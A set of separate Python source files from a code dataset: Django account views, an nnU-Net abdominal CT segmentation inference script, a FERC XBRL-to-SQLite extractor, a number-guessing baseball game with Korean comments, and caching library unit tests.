== Teams.objects.get(id=teamID).owner.accountName:\n Teams.objects.get(id=teamID).delete()\n print(\"Team deleted\")\n else:\n print(\"team not deleted\")\n return redirect('accounts:accountTeams', accountName)\n\n@login_required(login_url=login_path)\ndef accountAdEdit(request, accountName, adID):\n ad = Advertisements.objects.get(id = adID)\n days = ad.days\n sports = ad.sport\n print('ad days')\n print(ad.days)\n print('ad sport')\n print(ad.sport)\n print(days)\n print(listOfDaysInWeek)\n sportsList = Sports.objects.all()\n startHour = converTimeToClockTime(ad.EarliestTime.hour)\n startMinute = converTimeToClockTime(ad.EarliestTime.minute)\n endHour = converTimeToClockTime(ad.LatestTime.hour)\n endMinute = converTimeToClockTime(ad.LatestTime.minute)\n return render(request, 'accounts/editAd.html', {'ad': ad,'selectedSports':sports, 'sportsList':sportsList, 'accountName':accountName,\n 'startHour':startHour, 'startMinute':startMinute, 'endHour':endHour, 'endMinute':endMinute, 'days':days,'listOfDaysInWeek':listOfDaysInWeek})\n\n@login_required(login_url=login_path)\ndef accountAdEditMedium(request, accountName, adID):\n if request.user.username == 
Advertisements.objects.get(id=adID).owner.accountName:\n        print(\"Form in medium\")\n        print(request.POST)\n        ad = Advertisements.objects.get(id = adID)\n        notes = request.POST['Notes']\n        ad.notes = notes\n        ad.save()\n        print(\"account edited successfully\")\n    else:\n        print(\"account did not edit successfully\")\n    return redirect('accounts:accountAdvertisements', accountName)\n\n
@login_required(login_url=login_path)\ndef accountAdDelete(request, accountName, adID):\n\n    ad = Advertisements.objects.get(id = adID)\n    return render(request, 'accounts/deleteAd.html', {'ad':ad, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountAdDeleteMedium(request, accountName, adID):\n    if request.user.username == Advertisements.objects.get(id=adID).owner.accountName:\n        Advertisements.objects.get(id=adID).delete()\n        print(\"ad deleted\")\n    else:\n        print(\"ad not deleted\")\n    return redirect('accounts:accountAdvertisements', accountName)\n\n\n
@login_required(login_url=\"/accounts/login/\")\ndef organisationDelete(request, accountName, orgID):\n    org = Organisations.objects.get(id=orgID)\n    return render(request, 'accounts/deleteOrganisation.html', {'org':org, 'accountName':accountName})\n\n@login_required(login_url=\"/accounts/login/\")\ndef organisationDeleteMedium(request, accountName, orgID):\n    if request.user.username == Organisations.objects.get(id=orgID).owner.accountName:\n        #Only creator of an org can delete it\n        Organisations.objects.get(id=orgID).delete()\n\n\n    try:\n        return redirect('accounts:accountOrganisations', request.user.username)\n    except:\n        return redirect('articles:list')\n\n\n
@login_required(login_url=login_path)\ndef organisationEdit(request, accountName, orgID):\n    print(\"we are in making org - not in medium\")\n    org = Organisations.objects.get(id=orgID)\n    print(org)\n    print(org.id)\n    print(org.OrganisationName)\n    # return HttpResponse('homepage')\n    return render(request, 'accounts/editOrganisation.html', {'org':org})\n\n@login_required(login_url=login_path)\ndef organisationEditMedium(request, accountName, orgID):\n    nameOfOrg = 'test'\n\n    if request.method == 'POST':\n        try:\n            oldOrg = Organisations.objects.get(id = orgID)\n            if request.user.username == oldOrg.owner.accountName:\n                newOrg = Organisations(id = orgID)\n                print(newOrg)\n                print(request.POST)\n                print(\"here 1\")\n                nameOfOrg = request.POST['orgName']\n                newOrg.OrganisationName = nameOfOrg\n                print(\"here 2\")\n                newOrg.CompetitionRegistrationLink = request.POST['Registration_Link']\n                print(\"here 3\")\n                newOrg.owner = Accounts.objects.get(accountName = accountName)\n                newOrg.save()\n\n        except Exception as e:\n            print(e)\n            print(\"Exception, not making org\")\n            print(\"It is not making an Org\")\n            return render(request, 'organisation/OrgMakingFail.html')\n\n    return redirect('accounts:accountOrganisations', request.user.username)\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"181641592","text":"from glob import glob\nimport SimpleITK as sitk\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\nfrom typing import Union, Tuple, List\nimport torch\nimport torch.nn as nn\nfrom generic_UNet import InitWeights_He\nimport pickle\nimport os\nimport torch.nn.functional as F\nfrom generic_UNet import Generic_UNet\n\nprefix = \"version5\"\n\n
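# The nnU-Net plans pickle stores the preprocessing and architecture hyperparameters\n# (patch size, pooling and conv kernel sizes, target spacing, intensity statistics)\n# that are unpacked below (editor's note).\n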
\"/data/nnUNetFrame/DATASET/nnUNet_trained_models/nnUNet/3d_fullres/Task002_ABDSeg/nnUNetTrainer__nnUNetPlansv2.1/plans.pkl\"\nmodelfile = \"/data/nnUNetFrame/DATASET/nnUNet_trained_models/nnUNet/3d_fullres/Task002_ABDSeg/nnUNetTrainer__nnUNetPlansv2.1/all/model_final_checkpoint.model\"\nrawfs = glob(\"/home/SENSETIME/luoxiangde.vendor/Projects/ABDSeg/data/ABDSeg/data/imagesTs/*.nii.gz\")\n\ninfo = pickle.load(open(planfile, \"rb\"))\nplan_data = {}\nplan_data[\"plans\"] = info\nprint(plan_data)\n\n\ndef recycle_plot(data, prefix):\n for k, v in data.items():\n if isinstance(v, dict):\n if isinstance(k, int):\n k = \"%d\" % k\n recycle_plot(v, prefix + \"->\" + k)\n else:\n print(prefix, k, v)\n\n\nprint(\"hello\")\nresolution_index = 1\nnum_classes = plan_data['plans']['num_classes']\nbase_num_features = plan_data['plans']['base_num_features']\npatch_size = plan_data['plans']['plans_per_stage'][resolution_index]['patch_size']\npool_op_kernel_sizes = plan_data['plans']['plans_per_stage'][resolution_index]['pool_op_kernel_sizes']\nconv_kernel_sizes = plan_data['plans']['plans_per_stage'][resolution_index]['conv_kernel_sizes']\ncurrent_spacing = plan_data['plans']['plans_per_stage'][resolution_index]['current_spacing']\n# current_spacing = [i * 2 for i in current_spacing]\nprint(current_spacing)\nmean = plan_data['plans']['dataset_properties']['intensityproperties'][0]['mean']\nstd = plan_data['plans']['dataset_properties']['intensityproperties'][0]['sd']\nclip_min = plan_data['plans']['dataset_properties']['intensityproperties'][0]['percentile_00_5']\nclip_max = plan_data['plans']['dataset_properties']['intensityproperties'][0]['percentile_99_5']\n\nnorm_op_kwargs = {'eps': 1e-5, 'affine': True}\ndropout_op_kwargs = {'p': 0, 'inplace': True}\nnet_nonlin = nn.LeakyReLU\nnet_nonlin_kwargs = {'negative_slope': 1e-2, 'inplace': True}\n\nnet = Generic_UNet(1, base_num_features, num_classes + 1, len(pool_op_kernel_sizes), 2, 2,\n nn.Conv3d, nn.InstanceNorm3d, norm_op_kwargs, nn.Dropout3d,\n dropout_op_kwargs, net_nonlin, net_nonlin_kwargs, False, False, lambda x: x,\n InitWeights_He(1e-2), pool_op_kernel_sizes, conv_kernel_sizes, False, True, True)\n\n# print(net)\n\nnet.cuda()\ncheckpoint = torch.load(modelfile)\nweights = checkpoint['state_dict']\nnet.load_state_dict(weights, strict=False)\nnet.eval()\nnet.half()\n\n\n# summary(net, (1, 80, 160, 192), batch_size=1)\n\n\ndef _get_arr(path):\n sitkimg = sitk.ReadImage(path)\n arr = sitk.GetArrayFromImage(sitkimg)\n return arr, sitkimg\n\n\ndef _write_arr(arr, path, info=None):\n sitkimg = sitk.GetImageFromArray(arr)\n if info is not None:\n sitkimg.CopyInformation(info)\n sitk.WriteImage(sitkimg, path)\n\n\ndef get_do_separate_z(spacing, anisotropy_threshold=2):\n # do_separate_z = (np.max(spacing) / np.min(spacing)) > anisotropy_threshold\n do_separate_z = spacing[-1] > anisotropy_threshold\n return do_separate_z\n\n\ndef _compute_steps_for_sliding_window(patch_size: Tuple[int, ...],\n image_size: Tuple[int, ...],\n step_size: float) -> List[List[int]]:\n assert [i >= j for i, j in zip(image_size, patch_size)], \"image size must be as large or larger than patch_size\"\n assert 0 < step_size <= 1, 'step_size must be larger than 0 and smaller or equal to 1'\n\n # our step width is patch_size*step_size at most, but can be narrower. 
    # For example, if we have an image size of 110, a patch size of 32 and a step_size of 0.5,\n    # this yields 6 steps starting at coordinates 0, 16, 31, 47, 62, 78.\n    target_step_sizes_in_voxels = [i * step_size for i in patch_size]\n\n    num_steps = [int(np.ceil((i - k) / j)) + 1 for i, j, k in zip(image_size, target_step_sizes_in_voxels, patch_size)]\n\n    steps = []\n    for dim in range(len(patch_size)):\n        # the highest step value for this dimension is\n        max_step_value = image_size[dim] - patch_size[dim]\n        if num_steps[dim] > 1:\n            actual_step_size = max_step_value / (num_steps[dim] - 1)\n        else:\n            actual_step_size = 99999999999  # does not matter because there is only one step at 0\n\n        steps_here = [int(np.round(actual_step_size * i)) for i in range(num_steps[dim])]\n\n        steps.append(steps_here)\n\n    return steps\n\n\n
def _get_gaussian(patch_size, sigma_scale=1. / 8) -> np.ndarray:\n    tmp = np.zeros(patch_size)\n    center_coords = [i // 2 for i in patch_size]\n    sigmas = [i * sigma_scale for i in patch_size]\n    tmp[tuple(center_coords)] = 1\n    gaussian_importance_map = gaussian_filter(tmp, sigmas, 0, mode='constant', cval=0)\n    gaussian_importance_map = gaussian_importance_map / np.max(gaussian_importance_map) * 1\n    gaussian_importance_map = gaussian_importance_map.astype(np.float32)\n    # gaussian_importance_map cannot be 0, otherwise we may end up with nans!\n    gaussian_importance_map[gaussian_importance_map == 0] = np.min(\n        gaussian_importance_map[gaussian_importance_map != 0])\n    return gaussian_importance_map\n\n\ngaussian_mask = torch.from_numpy(_get_gaussian(patch_size)[np.newaxis, np.newaxis]).cuda().half().clamp_min_(1e-4)\n\n\n
def predict(arr):\n    prob_map = torch.zeros((1, num_classes + 1,) + arr.shape).half().cuda()\n    arr_clip = np.clip(arr, clip_min, clip_max)\n    raw_norm = (arr_clip - mean) / std\n    print(raw_norm.shape)\n\n    steps = _compute_steps_for_sliding_window(patch_size, raw_norm.shape, 0.7)\n    num_tiles = len(steps[0]) * len(steps[1]) * len(steps[2])\n    if 1:\n        print(\"data shape:\", raw_norm.shape)\n        print(\"patch size:\", patch_size)\n        print(\"steps (x, y, and z):\", steps)\n        print(\"number of tiles:\", num_tiles)\n\n    for x in steps[0]:\n        lb_x = x\n        ub_x = x + patch_size[0]\n        for y in steps[1]:\n            lb_y = y\n            ub_y = y + patch_size[1]\n            for z in steps[2]:\n                lb_z = z\n                ub_z = z + patch_size[2]\n                with torch.no_grad():\n                    tensor_arr = torch.from_numpy(\n                        raw_norm[lb_x:ub_x, lb_y:ub_y, lb_z:ub_z][np.newaxis, np.newaxis]).cuda().half()\n                    seg_pro = net(tensor_arr)\n                    print(np.mean(raw_norm), torch.mean(tensor_arr))\n                    _pred = seg_pro * gaussian_mask\n                    prob_map[:, :, lb_x:ub_x, lb_y:ub_y, lb_z:ub_z] += _pred\n    torch.cuda.empty_cache()\n    return prob_map.detach().cpu()\n\n\n
def itk_change_spacing(src_itk, output_spacing, interpolate_method='Linear'):\n    assert interpolate_method in ['Linear', 'NearestNeighbor']\n    src_size = src_itk.GetSize()\n    src_spacing = src_itk.GetSpacing()\n\n    re_sample_scale = tuple(np.array(src_spacing) / np.array(output_spacing).astype(np.float64))\n    re_sample_size = tuple(np.array(src_size).astype(np.float64) * np.array(re_sample_scale))\n\n    re_sample_size = [int(round(x)) for x in re_sample_size]\n    output_spacing = tuple((np.array(src_size) / np.array(re_sample_size)) * np.array(src_spacing))\n\n    re_sampler = sitk.ResampleImageFilter()\n    re_sampler.SetOutputPixelType(src_itk.GetPixelID())\n    re_sampler.SetReferenceImage(src_itk)\n    re_sampler.SetSize(re_sample_size)\n    re_sampler.SetOutputSpacing(output_spacing)\n    re_sampler.SetInterpolator(eval('sitk.sitk' + interpolate_method))\n
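    # eval() resolves the method name to the SimpleITK constant, e.g. 'Linear' ->\n    # sitk.sitkLinear and 'NearestNeighbor' -> sitk.sitkNearestNeighbor (editor's note).\n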
    return re_sampler.Execute(src_itk)\n\n\ndef resample_image_to_ref(image, ref, interp=sitk.sitkNearestNeighbor, pad_value=0):\n    resample = sitk.ResampleImageFilter()\n    resample.SetReferenceImage(ref)\n    resample.SetDefaultPixelValue(pad_value)\n    resample.SetInterpolator(interp)\n    return resample.Execute(image)\n\n\n
def task(rawf):\n    arr_raw, sitk_raw = _get_arr(rawf)\n    origin_spacing = sitk_raw.GetSpacing()\n    rai_size = sitk_raw.GetSize()\n    print(rai_size)\n\n    if get_do_separate_z(origin_spacing) or get_do_separate_z(current_spacing[::-1]):\n        print('preprocessing: do separate z.....')\n        img_arr = []\n        for i in range(rai_size[-1]):\n            img_arr.append(sitk.GetArrayFromImage(itk_change_spacing(sitk_raw[:, :, i], current_spacing[::-1][:-1])))\n        img_arr = np.array(img_arr)\n        img_sitk = sitk.GetImageFromArray(img_arr)\n        img_sitk.SetOrigin(sitk_raw.GetOrigin())\n        img_sitk.SetDirection(sitk_raw.GetDirection())\n        img_sitk.SetSpacing(tuple(current_spacing[::-1][:-1]) + (origin_spacing[-1],))\n        img_arr = sitk.GetArrayFromImage(\n            itk_change_spacing(img_sitk, current_spacing[::-1], interpolate_method='NearestNeighbor'))\n    else:\n        img_arr = sitk.GetArrayFromImage(itk_change_spacing(sitk_raw, current_spacing[::-1]))\n    print(img_arr.shape)\n    pad_flag = 0\n    padzyx = np.clip(np.array(patch_size) - np.array(img_arr.shape), 0, 1000)\n    if np.any(padzyx > 0):\n        pad_flag = 1\n        pad_left = padzyx // 2\n        pad_right = padzyx - padzyx // 2\n        img_arr = np.pad(img_arr,\n                         ((pad_left[0], pad_right[0]), (pad_left[1], pad_right[1]), (pad_left[2], pad_right[2])))\n\n    prob_map = predict(img_arr)\n\n    if pad_flag:\n        prob_map = prob_map[:, :,\n                   pad_left[0]: img_arr.shape[0] - pad_right[0],\n                   pad_left[1]: img_arr.shape[1] - pad_right[1],\n                   pad_left[2]: img_arr.shape[2] - pad_right[2]]\n    del img_arr\n\n    '''\n    FYI: in order to smooth the organ edges, is there a better choice?\n    '''\n\n
    if get_do_separate_z(origin_spacing) or get_do_separate_z(current_spacing[::-1]):\n        print('postprocessing: do separate z......')\n        prob_map_interp_xy = torch.zeros(\n            list(prob_map.size()[:2]) + [prob_map.size()[2], ] + list(sitk_raw.GetSize()[::-1][1:]), dtype=torch.half)\n\n        for i in range(prob_map.size(2)):\n            prob_map_interp_xy[:, :, i] = F.interpolate(prob_map[:, :, i].cuda().float(),\n                                                        size=sitk_raw.GetSize()[::-1][1:],\n                                                        mode=\"bilinear\").detach().half().cpu()\n        del prob_map\n\n        prob_map_interp = np.zeros(list(prob_map_interp_xy.size()[:2]) + list(sitk_raw.GetSize()[::-1]),\n                                   dtype=np.float16)\n\n        for i in range(prob_map_interp.shape[1]):\n            prob_map_interp[:, i] = F.interpolate(prob_map_interp_xy[:, i:i + 1].cuda().float(),\n                                                  size=sitk_raw.GetSize()[::-1],\n                                                  mode=\"nearest\").detach().half().cpu().numpy()\n        del prob_map_interp_xy\n\n    else:\n        prob_map_interp = np.zeros(list(prob_map.size()[:2]) + list(sitk_raw.GetSize()[::-1]), dtype=np.float16)\n\n        for i in range(prob_map.size(1)):\n            prob_map_interp[:, i] = F.interpolate(prob_map[:, i:i + 1].cuda().float(),\n                                                  size=sitk_raw.GetSize()[::-1],\n                                                  mode=\"trilinear\").detach().half().cpu().numpy()\n        del prob_map\n\n    segmentation = np.argmax(prob_map_interp.squeeze(0), axis=0)\n    del prob_map_interp\n    pred_sitk = sitk.GetImageFromArray(segmentation.astype(np.uint8))\n    pred_sitk.CopyInformation(sitk_raw)\n    pred_sitk = resample_image_to_ref(pred_sitk, sitk_raw)\n    sitk.WriteImage(pred_sitk, rawf.replace(\".nii.gz\", \"_nnUNet_pred.nii.gz\"))\n\n\nrawf = 
\"/home/SENSETIME/luoxiangde.vendor/Projects/ABDSeg/data/ABDSeg/data/imagesTs/ABD_0016.nii.gz\"\ntask(rawf)\n","sub_path":"Inference3D.py","file_name":"Inference3D.py","file_ext":"py","file_size_in_byte":11855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564527844","text":"\"\"\"Generic extractor for all FERC XBRL data.\"\"\"\nimport io\nimport json\nfrom datetime import date, datetime\nfrom pathlib import Path\n\nimport sqlalchemy as sa\nfrom dagster import Field, Noneable, op\nfrom ferc_xbrl_extractor import xbrl\nfrom ferc_xbrl_extractor.instance import InstanceBuilder\n\nimport pudl\nfrom pudl.helpers import EnvVar\nfrom pudl.settings import FercGenericXbrlToSqliteSettings, XbrlFormNumber\nfrom pudl.workspace.datastore import Datastore\n\nlogger = pudl.logging_helpers.get_logger(__name__)\n\n\nclass FercXbrlDatastore:\n \"\"\"Simple datastore wrapper for accessing ferc1 xbrl resources.\"\"\"\n\n def __init__(self, datastore: Datastore):\n \"\"\"Instantiate datastore wrapper for ferc1 resources.\"\"\"\n self.datastore = datastore\n\n def get_taxonomy(self, year: int, form: XbrlFormNumber) -> tuple[io.BytesIO, str]:\n \"\"\"Returns the path to the taxonomy entry point within the an archive.\"\"\"\n raw_archive = self.datastore.get_unique_resource(\n f\"ferc{form.value}\", year=year, data_format=\"xbrl\"\n )\n\n # Construct path to taxonomy entry point within archive\n taxonomy_date = date(year, 1, 1).isoformat()\n taxonomy_entry_point = f\"taxonomy/form{form.value}/{taxonomy_date}/form/form{form.value}/form-{form.value}_{taxonomy_date}.xsd\"\n\n return io.BytesIO(raw_archive), taxonomy_entry_point\n\n def get_filings(self, year: int, form: XbrlFormNumber) -> list[InstanceBuilder]:\n \"\"\"Return list of filings from archive.\"\"\"\n archive = self.datastore.get_zipfile_resource(\n f\"ferc{form.value}\", year=year, data_format=\"xbrl\"\n )\n\n # Load RSS feed metadata\n filings = []\n with archive.open(\"rssfeed\") as f:\n metadata = json.load(f)\n\n # Loop through all filings by a given filer in a given quarter\n # And take the most recent one\n for key, filing_info in metadata.items():\n latest = datetime.min\n for filing_id, info in filing_info.items():\n # Parse date from 9-tuple\n published = datetime.fromisoformat(info[\"published_parsed\"])\n\n if published > latest:\n latest = published\n latest_filing = filing_id\n\n # Create in memory buffers with file data to be used in conversion\n filings.append(\n InstanceBuilder(\n io.BytesIO(archive.open(f\"{latest_filing}.xbrl\").read()),\n latest_filing,\n )\n )\n\n return filings\n\n\ndef _get_sqlite_engine(\n form_number: int, output_path: Path, clobber: bool\n) -> sa.engine.Engine:\n \"\"\"Create SQLite engine for specified form and drop tables.\n\n Args:\n form_number: FERC form number.\n output_path: path to PUDL outputs.\n clobber: Flag indicating whether or not to drop tables.\n \"\"\"\n # Read in the structure of the DB, if it exists\n logger.info(\n f\"Dropping the old FERC Form {form_number} XBRL derived SQLite DB if it exists.\"\n )\n db_path = output_path / f\"ferc{form_number}_xbrl.sqlite\"\n\n logger.info(f\"Connecting to SQLite at {db_path}...\")\n sqlite_engine = sa.create_engine(f\"sqlite:///{db_path}\")\n logger.info(f\"Connected to SQLite at {db_path}!\")\n try:\n # So that we can wipe it out\n pudl.helpers.drop_tables(sqlite_engine, clobber=clobber)\n except sa.exc.OperationalError:\n pass\n\n return sqlite_engine\n\n\n@op(\n config_schema={\n 
\"pudl_output_path\": Field(\n EnvVar(\n env_var=\"PUDL_OUTPUT\",\n ),\n description=\"Path of directory to store the database in.\",\n default_value=None,\n ),\n \"clobber\": Field(\n bool, description=\"Clobber existing ferc1 database.\", default_value=False\n ),\n \"workers\": Field(\n Noneable(int),\n description=\"Specify number of worker processes for parsing XBRL filings.\",\n default_value=None,\n ),\n \"batch_size\": Field(\n int,\n description=\"Specify number of XBRL instances to be processed at a time (defaults to 50)\",\n default_value=50,\n ),\n },\n required_resource_keys={\"ferc_to_sqlite_settings\", \"datastore\"},\n)\ndef xbrl2sqlite(context) -> None:\n \"\"\"Clone the FERC Form 1 XBRL Databsae to SQLite.\"\"\"\n output_path = Path(context.op_config[\"pudl_output_path\"])\n clobber = context.op_config[\"clobber\"]\n batch_size = context.op_config[\"batch_size\"]\n workers = context.op_config[\"workers\"]\n ferc_to_sqlite_settings = context.resources.ferc_to_sqlite_settings\n datastore = datastore = context.resources.datastore\n datastore = FercXbrlDatastore(datastore)\n\n # Loop through all other forms and perform conversion\n for form in XbrlFormNumber:\n # Get desired settings object\n settings = ferc_to_sqlite_settings.get_xbrl_dataset_settings(form)\n\n # If no settings for form in question, skip\n if settings is None:\n continue\n\n if settings.disabled:\n logger.info(f\"Dataset ferc{form}_xbrl is disabled, skipping\")\n continue\n\n sqlite_engine = _get_sqlite_engine(form.value, output_path, clobber)\n\n convert_form(\n settings,\n form,\n datastore,\n sqlite_engine,\n output_path=output_path,\n batch_size=batch_size,\n workers=workers,\n )\n\n\ndef convert_form(\n form_settings: FercGenericXbrlToSqliteSettings,\n form: XbrlFormNumber,\n datastore: FercXbrlDatastore,\n sqlite_engine: sa.engine.Engine,\n output_path: Path,\n batch_size: int | None = None,\n workers: int | None = None,\n) -> None:\n \"\"\"Clone a single FERC XBRL form to SQLite.\n\n Args:\n form_settings: Validated settings for converting the desired XBRL form to SQLite.\n form: FERC form number.\n datastore: Instance of a FERC XBRL datastore for retrieving data.\n sqlite_engine: SQLAlchemy connection to mirrored database.\n pudl_settings: Dictionary containing paths and database URLs\n used by PUDL.\n batch_size: Number of XBRL filings to process in a single CPU process.\n workers: Number of CPU processes to create for processing XBRL filings.\n\n Returns:\n None\n \"\"\"\n datapackage_path = str(output_path / f\"ferc{form.value}_xbrl_datapackage.json\")\n metadata_path = str(output_path / f\"ferc{form.value}_xbrl_taxonomy_metadata.json\")\n # Process XBRL filings for each year requested\n for year in form_settings.years:\n raw_archive, taxonomy_entry_point = datastore.get_taxonomy(year, form)\n xbrl.extract(\n datastore.get_filings(year, form),\n sqlite_engine,\n raw_archive,\n form.value,\n batch_size=batch_size,\n workers=workers,\n datapackage_path=datapackage_path,\n metadata_path=metadata_path,\n archive_file_path=taxonomy_entry_point,\n )\n","sub_path":"src/pudl/extract/xbrl.py","file_name":"xbrl.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"215781274","text":"import random\nimport os\n\nnumbers = []\nnumber = str(random.randint(0, 9))\n\nfor i in range(3):\n while number in numbers:\n number = str(random.randint(0, 9))\n numbers.append(number)\n# for문을 사용해 3번 반복한다.\n# while문을 사용해 
\nos.system(\"cls\")\n\nprint(\"*\" * 60)\nprint(\"Starting the baseball game!\")\nprint(\"*\" * 60)\n\ncountStrike = 0\ncountBall = 0\n# Set up the counters\n\nwhile countStrike < 3:\n    countStrike = 0\n    countBall = 0\n# Re-initialize the counters each round so a fresh result can be read off.\n\n    num = str(input(\"Enter a 3-digit number> \"))\n    if len(num) == 3:\n        for i in range(0, 3):\n            for j in range(0, 3):\n                if num[i] == numbers[j] and i == j:\n                    countStrike += 1\n                elif num[i] == numbers[j] and i != j:\n                    countBall += 1\n# Two nested for loops compare the 3 digits the user entered against the digits in the\n# existing numbers list.\n# Same value in the same position: strike + 1; same value in a different position: ball + 1\n\n    if countStrike == 0 and countBall == 0:\n        print(\"3 Out!\")\n    else:\n        output = \"\"\n        if countStrike > 0:\n            output += \"{} Strike\" .format(countStrike)\n        if countBall > 0:\n            output += \" {} Ball\" .format(countBall)\n\n        print(output.strip())\n# To report the result, the if statement prints \"3 Out!\" when both the strike and ball counts\n# are 0; otherwise the two if blocks inside else add the strike and ball counts to output and\n# print it. output.strip() trims the unneeded leading space before printing.\n\n# The while loop only repeats while the strike count is under 3, so once num matches the\n# numbers array the loop breaks and the final \"Mission Completed!\" message is printed.\n\n\nprint(\"Mission Completed!\")","sub_path":"python/02_숫자야구게임/baseballgame.py","file_name":"baseballgame.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"467695763","text":"# -*- coding: utf-8 -*-\n# vim: sw=4:ts=4:expandtab\n\"\"\"\n    tests.test_cache\n    ~~~~~~~~~~~~~~~~\n\n    Provides unit tests.\n\"\"\"\nimport time\nimport random\n\nimport nose.tools as nt\n\nfrom mezmorize import Cache, function_namespace\nfrom mezmorize.utils import HAS_MEMCACHE, HAS_REDIS, get_cache_config\n\nfrom mezmorize.backends import (\n    SimpleCache, FileSystemCache, RedisCache, MemcachedCache,\n    SASLMemcachedCache, SpreadSASLMemcachedCache, AVAIL_MEMCACHES)\n\nBIGINT = 2 ** 21\nBIGGERINT = 2 ** 28\n\n\ndef setup_func(*args, **kwargs):\n    namespace = kwargs.pop('namespace', None)\n    client_name = kwargs.pop('client_name', None)\n\n    if client_name:\n        CACHE_OPTIONS = kwargs.get('CACHE_OPTIONS', {})\n        CACHE_OPTIONS['preferred_memcache'] = client_name\n        kwargs['CACHE_OPTIONS'] = CACHE_OPTIONS\n\n    config = get_cache_config(*args, **kwargs)\n    cache = Cache(namespace=namespace, **config)\n    return cache\n\n\ndef check_cache_type(cache, cache_type):\n    nt.assert_equal(cache.config['CACHE_TYPE'], cache_type)\n\n\ndef check_cache_instance(cache, cache_instance):\n    nt.assert_is_instance(cache.cache, cache_instance)\n\n\ndef check_client_name(cache, expected):\n    nt.assert_equal(cache.cache.client_name, expected)\n\n\ndef check_too_big(cache, times, error=None):\n    if cache.cache.TooBig:\n        with nt.assert_raises(error or cache.cache.TooBig):\n            cache.set('big', 'a' * times)\n\n        nt.assert_is_none(cache.get('big'))\n    else:\n        cache.set('big', 'a' * times)\n        nt.assert_equal(cache.get('big'), 'a' * times)\n\n\ndef check_set_delete(cache, key, value, multiplier=None):\n    if multiplier:\n        value *= multiplier\n\n    cache.set(key, value)\n    nt.assert_equal(cache.get(key), value)\n\n    cache.delete(key)\n    nt.assert_is_none(cache.get(key))\n\n\nclass TestCache(object):\n    def setup(self):\n        self.cache = setup_func('simple')\n\n    def teardown(self):\n        self.cache.clear()\n\n    def test_dict_config(self):\n        check_cache_type(self.cache, 'simple')\n        check_cache_instance(self.cache, SimpleCache)\n\n    def test_000_set(self):\n        
self.cache.set('hi', 'hello')\n nt.assert_equal(self.cache.get('hi'), 'hello')\n\n def test_add(self):\n self.cache.add('hi', 'hello')\n nt.assert_equal(self.cache.get('hi'), 'hello')\n\n self.cache.add('hi', 'foobar')\n nt.assert_equal(self.cache.get('hi'), 'hello')\n\n def test_add_unicode(self):\n self.cache.add('ȟį', 'ƕɛĺłö')\n nt.assert_equal(self.cache.get('ȟį'), 'ƕɛĺłö')\n\n self.cache.add('ȟį', 'fööƀåř')\n nt.assert_equal(self.cache.get('ȟį'), 'ƕɛĺłö')\n\n def test_add_bytes(self):\n self.cache.add(b'hi', b'hello')\n nt.assert_equal(self.cache.get(b'hi'), b'hello')\n\n self.cache.add(b'hi', b'foobar')\n nt.assert_equal(self.cache.get(b'hi'), b'hello')\n\n def test_delete(self):\n check_set_delete(self.cache, 'hi', 'hello')\n\n def test_delete_unicode(self):\n check_set_delete(self.cache, 'ȟį', 'ƕɛĺłö')\n\n def test_delete_bytes(self):\n check_set_delete(self.cache, b'hi', b'foobar')\n\n def test_memoize(self):\n @self.cache.memoize(5)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n time.sleep(1)\n nt.assert_equal(func(5, 2), result)\n\n result2 = func(5, 3)\n nt.assert_not_equal(result2, result)\n\n time.sleep(6)\n nt.assert_not_equal(func(5, 2), result)\n\n time.sleep(1)\n nt.assert_not_equal(func(5, 3), result2)\n\n def test_timeout(self):\n config = get_cache_config('simple', CACHE_DEFAULT_TIMEOUT=1)\n self.cache = Cache(**config)\n\n @self.cache.memoize(50)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n time.sleep(2)\n nt.assert_equal(func(5, 2), result)\n\n def test_delete_timeout(self):\n @self.cache.memoize(5)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n result2 = func(5, 3)\n time.sleep(1)\n\n nt.assert_equal(func(5, 2), result)\n nt.assert_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result)\n nt.assert_equal(func(5, 3), result2)\n\n self.cache.delete_memoized(func)\n nt.assert_not_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result2)\n\n def test_delete_verhash(self):\n @self.cache.memoize(5)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n result2 = func(5, 3)\n time.sleep(1)\n\n nt.assert_equal(func(5, 2), result)\n nt.assert_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result)\n nt.assert_equal(func(5, 3), result2)\n\n fname = function_namespace(func)[0]\n version_key = self.cache._memvname(fname)\n nt.assert_is_not_none(self.cache.get(version_key))\n\n self.cache.delete_memoized_verhash(func)\n nt.assert_is_none(self.cache.get(version_key))\n nt.assert_not_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result2)\n nt.assert_is_not_none(self.cache.get(version_key))\n\n def test_delete_rand(self):\n @self.cache.memoize()\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result_a = func(5, 1)\n result_b = func(5, 2)\n nt.assert_equal(func(5, 1), result_a)\n nt.assert_equal(func(5, 2), result_b)\n\n self.cache.delete_memoized(func, 5, 2)\n nt.assert_equal(func(5, 1), result_a)\n nt.assert_not_equal(func(5, 2), result_b)\n\n def test_args(self):\n @self.cache.memoize()\n def func(a, b):\n return sum(a) + sum(b) + random.randrange(0, 100000)\n\n result_a = func([5, 3, 2], [1])\n result_b = func([3, 3], [3, 1])\n nt.assert_equal(func([5, 3, 2], [1]), result_a)\n nt.assert_equal(func([3, 3], [3, 1]), result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1])\n nt.assert_not_equal(func([5, 3, 2], [1]), result_a)\n 
